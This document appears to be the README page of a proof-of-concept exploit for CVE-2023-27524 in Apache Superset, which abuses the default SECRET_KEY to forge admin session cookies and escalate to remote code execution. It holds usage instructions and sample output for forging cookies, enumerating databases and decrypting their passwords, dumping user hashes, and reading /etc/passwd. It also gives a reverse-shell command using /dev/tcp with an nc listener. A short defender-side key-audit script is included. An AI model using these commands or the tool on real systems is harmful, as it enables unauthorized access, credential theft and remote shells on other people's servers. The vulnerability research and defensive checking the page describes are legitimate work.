
CVE-2023-27524 PoC — Apache Superset: Session validation vulnerability when using provided default SECRET_KEY

Associated Vulnerability
Title: Apache Superset: Session validation vulnerability when using provided default SECRET_KEY (CVE-2023-27524)
Description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config. All Superset installations should always set a unique, secure random SECRET_KEY. Your SECRET_KEY is used to securely sign all session cookies and to encrypt sensitive information in the database. Add a strong SECRET_KEY to your `superset_config.py` file like: `SECRET_KEY = <YOUR_OWN_RANDOM_GENERATED_SECRET_KEY>`. Alternatively you can set it with the `SUPERSET_SECRET_KEY` environment variable.
Readme
# CVE-2023-27524: Apache Superset Auth Bypass and RCE

Apache Superset, a widely used open-source tool for data visualization and exploration, ships with an insecure default configuration that can lead to authentication bypass and remote code execution (RCE). An attacker who exploits it can obtain administrative privileges on the affected server, harvest stored credentials, and potentially compromise data.

The underlying issue is an insecure-default-configuration vulnerability tracked as CVE-2023-27524.

The root cause is the predictable Flask `SECRET_KEY` that Superset sets during installation: every session cookie is signed with that key, so anyone who knows it can forge a valid session. A substantial number of exposed Apache Superset instances were affected, and although mitigations have since been released, the issue remains critical for anyone who has not changed the key.

The issue can be escalated to RCE; this script adds that capability on top of the [original PoC](https://github.com/horizon3ai/CVE-2023-27524).

[Official](https://nvd.nist.gov/vuln/detail/cve-2023-27524) vulnerability description:
> Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
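As an added defender-side check (not part of this PoC or of the Superset project), the script below covers the two things the advisory implies you should verify: that the key Superset will actually load is not a shipped default, and that a session cookie issued by your instance no longer validates under a default key. The cookie check re-implements Flask's itsdangerous signing scheme; `PAGE_COOKIE` is the forged cookie printed in the README output further down, `SAMPLE_CONFIG` is a constructed input, and `MIN_LEN` is this example's own threshold.

```python
import base64
import hashlib
import hmac
import re
import secrets

# Default values named in the advisory/README above; MIN_LEN is this example's own policy.
KNOWN_DEFAULT_KEYS = {"CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET", "YOUR_OWN_RANDOM_GENERATED_SECRET_KEY"}
MIN_LEN = 32
# Forged cookie for user 1, copied verbatim from the README output on this page.
PAGE_COOKIE = "eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsQ6Q.nKTBZiUq-Cu0iWSLQIUtB2W9HnM"
# Constructed superset_config.py that still carries the shipped default (sample input).
SAMPLE_CONFIG = 'ROW_LIMIT = 5000\nSECRET_KEY = "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET"\n'

def effective_secret_key(config_py: str, env: dict) -> str:
    """Key Superset ends up using: a literal SECRET_KEY in superset_config.py wins, then
    SUPERSET_SECRET_KEY from the environment, then the shipped default. Computed values are not parsed."""
    m = re.search(r'^\s*SECRET_KEY\s*=\s*(["\'])(.*?)\1', config_py, re.MULTILINE)
    if m:
        return m.group(2)
    return env.get("SUPERSET_SECRET_KEY") or "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET"

def audit_secret_key(key: str) -> list:
    """Findings for a candidate key; an empty list means it passes."""
    findings = []
    if key in KNOWN_DEFAULT_KEYS:
        findings.append("known default key: session cookies can be forged (CVE-2023-27524)")
    if len(key) < MIN_LEN:
        findings.append(f"key shorter than {MIN_LEN} characters")
    return findings

def generate_secret_key() -> str:
    """Fresh replacement from 42 random bytes (the size Superset's docs use with openssl rand)."""
    return secrets.token_urlsafe(42)

def cookie_signed_with(cookie: str, candidates):
    """Return the candidate key that validates a Flask session cookie, else None. Flask signs
    'payload.timestamp' with HMAC-SHA1 using key = HMAC-SHA1(secret, b'cookie-session')."""
    signed, sep, sig = cookie.rpartition(".")
    if not sep or not signed:
        return None
    for key in candidates:
        derived = hmac.new(key.encode(), b"cookie-session", hashlib.sha1).digest()
        mac = hmac.new(derived, signed.encode(), hashlib.sha1).digest()
        expected = base64.urlsafe_b64encode(mac).rstrip(b"=")
        if hmac.compare_digest(expected, sig.encode()):
            return key
    return None
```

Run `audit_secret_key(effective_secret_key(open("superset_config.py").read(), os.environ))` on the host and `cookie_signed_with(<fresh session cookie>, KNOWN_DEFAULT_KEYS)` after rotation; both must come back empty/None.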

## Blog Post
This exploit script is written for a CVE analysis on [vsociety](https://www.vicarius.io/vsociety/).

## Usage

Install PIP packages:
```
pip3 install -r requirements.txt
```

Usage:
```
usage: exploit.py [-h] --url URL [--id ID] [--wordlist WORDLIST] [--validate] [--enum-dbs] [--enum-users] [--cmd CMD]
                  [--revshell REVSHELL] [--db-host]

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Host URL
  --id ID               User ID to forge session cookie for. Default=1
  --wordlist WORDLIST, -w WORDLIST
                        Specify a wordlist file (default is 10.txt)
  --validate, -v        Validate the presence of vulnerability by login attempt
  --enum-dbs, -dbs      Enumerate databases
  --enum-users, -eu     Enumerate Superset users
  --cmd CMD, -c CMD     Run custom OS command on the database's server.
  --revshell REVSHELL   Specify IP:Port for reverse shell
  --db-host             Run commands or open reverse shell on the database server
```

## Examples

### Validate vulnerability and try to crack app secret with a custom wordlist
```
# python3 exploit.py --url http://localhost:8088 -v -w 10k_most_common_passwords.txt
[+] Session cookie found.
[+] Decoded session cookie: <REDACTED>
[+] Using '10k_most_common_passwords.txt' as a wordlist.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
[+] Forged session cookie for user 1: <REDACTED>
[+] Superset Version: 2.0.1
[+] Login successful. Vulnerability is validated.
```

### Enumerate databases
```
# python3 exploit.py -u http://localhost:8088 --enum-dbs
[+] Session cookie found.
[+] Decoded session cookie:
    {'csrf_token': '5d4c9ad6caf94bc1c652b0fc8e8739d19c45c05a', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
    eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsQ6Q.nKTBZiUq-Cu0iWSLQIUtB2W9HnM
[+] Version 2.0.1 seems vulnerable.
[+] Enumerating databases via API...
[+] Found database: "examples" with password "superset".
[+] Found database: "SQLite".
[+] Enumerating database connection data and cracking password if possible...
+-----------------+---------------------------------------------------+--------------------------+----------------------+
| database_name   | sqlalchemy_uri                                    | password                 | decrypted_password   |
|-----------------+---------------------------------------------------+--------------------------+----------------------|
| examples        | postgresql://superset:XXXXXXXXXX@db:5432/superset | MAqp6AIikZpDM5bMH4MMgA== | superset********     |
| SQLite          | sqlite+pysqlite:////app/superset_home/superset.db |                          |                      |
+-----------------+---------------------------------------------------+--------------------------+----------------------+
[+] Process of enumerating databases finished.
```

### Enumerate Superset users
```
# python3 exploit.py -u http://localhost:8088 --enum-users
[+] Session cookie found.
[+] Decoded session cookie:
    {'csrf_token': '2a3adb09bac36c330a77c74da1cca27c431779e8', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
    eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRCQ.qeci7JgO5Lb4AwexB0Qojp5RDbs
[+] Version 2.0.1 seems vulnerable.
[+] Checking existing metadata database connection...
[+] Settings of database with id 1 were successfully modified.
[+] Settings of database with id 2 were successfully modified.
[+] Superset metadata connection is already added with id 2.
[+] Trying to enumerate Superset users...
[+] RESULT:
+------------+--------------------------------------------------------------------------------------------------------+
| username   | password                                                                                               |
|------------+--------------------------------------------------------------------------------------------------------|
| admin      | pbkdf2:sha256:260000$z5y5YnluWzyx4kd2$33c40dfefdea9aedef6ed171a941492516ba49c1ed8ed740d7e05446ce639c0e |
+------------+--------------------------------------------------------------------------------------------------------+
```

### Run custom OS command
On Superset server:
```
# python3 exploit.py --url http://localhost:8088 --cmd 'bash -i >& /dev/tcp/<IP>/4242 0>&1'
```
Note that in this case the output can't be viewed yet.

On DB server:
```
# python3 exploit.py -u http://localhost:8088 --cmd 'cat /etc/passwd' --db-host

[+] Session cookie found.
[+] Decoded session cookie:
    {'csrf_token': 'c2154d7077f507bd69c791f9d6de49115ba290a3', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
    eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRMw.haTjE2XBuVjamMvsdg7SemBr3Ig
[+] Version 2.0.1 seems vulnerable.
[+] Trying to run command on the database server...
[+] Settings of database with id 1 were successfully modified.
[+] $ cat /etc/passwd
+-----------------------------------------------------------------------------------+
| cmd_output                                                                        |
|-----------------------------------------------------------------------------------|
| root:x:0:0:root:/root:/bin/bash                                                   |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin                                   |
| <REDACTED>                                                                        |
| postgres:x:999:999::/var/lib/postgresql:/bin/bash                                 |
+-----------------------------------------------------------------------------------+
```

### Open a reverse shell

On Superset server:
```
# Terminal 1
nc -lvnp [PORT]

# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT]
```

On DB server:
```
# Terminal 1
nc -lvnp [PORT]

# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT] --db-host
```

## Disclaimer
This exploit script has been created solely for the purposes of research and for the development of effective defensive techniques. It is not intended to be used for any malicious or unauthorized activities. The author and the owner of the script disclaim any responsibility or liability for any misuse or damage caused by this software. Users are urged to use this software responsibly and only in accordance with applicable laws and regulations. Use responsibly.
File Snapshot

/data/pocs/26e05b42b0e2eda24cc1b56db2818c9d5a4e3402
├── [ 71K] 10k_most_common_passwords.txt
├── [ 26K] exploit.py
├── [8.3K] README.md
└── [ 105] requirements.txt

0 directories, 4 files